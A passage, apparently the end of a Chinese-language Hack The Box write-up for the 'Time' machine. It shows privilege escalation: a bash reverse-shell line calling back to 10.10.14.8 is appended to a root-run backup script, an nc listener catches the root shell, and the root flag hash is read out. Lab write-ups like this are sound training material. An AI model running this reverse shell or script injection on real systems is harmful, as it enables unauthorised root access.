pericles@time:/tmp$ echo "bash -i >& /dev/tcp/10.10.14.8/10086 0>&1" >> /usr/bin/timer_backup.sh
</10.10.14.8/10086 0>&1" >> /usr/bin/timer_backup.sh
pericles@time:/tmp$ 

18、成功的获取到了root权限，但是这里搁1秒就会自动退出

──(kali㉿kali)-[~/桌面]
└─$ nc -lvnp 10086
listening on [any] 10086 ...
connect to [10.10.14.8] from (UNKNOWN) [10.10.10.214] 50098
bash: cannot set terminal process group (44607): Inappropriate ioctl for device
bash: no job control in this shell
root@time:/# id
id
uid=0(root) gid=0(root) groups=0(root)
root@time:/# exit
                                                                                         
┌──(kali㉿kali)-[~/桌面]
└─$ nc -lvnp 10086                         
listening on [any] 10086 ...
connect to [10.10.14.8] from (UNKNOWN) [10.10.10.214] 50102
bash: cannot set terminal process group (44684): Inappropriate ioctl for device
bash: no job control in this shell
root@time:/# exit

19、没办法，那我就只能快速的查看下最后一个flag就撤吧。。。

┌──(kali㉿kali)-[~/桌面]
└─$ nc -lvnp 10086
listening on [any] 10086 ...
connect to [10.10.14.8] from (UNKNOWN) [10.10.10.214] 50128
bash: cannot set terminal process group (44997): Inappropriate ioctl for device
bash: no job control in this shell
root@time:/# cat /root/root.txt
cat /root/root.txt
e1154dfb9421b9a26d8123aed18be25f
root@time:/# exit

0x03 通关凭证展示

https://www.hackthebox.com/achievement/machine/1705469/286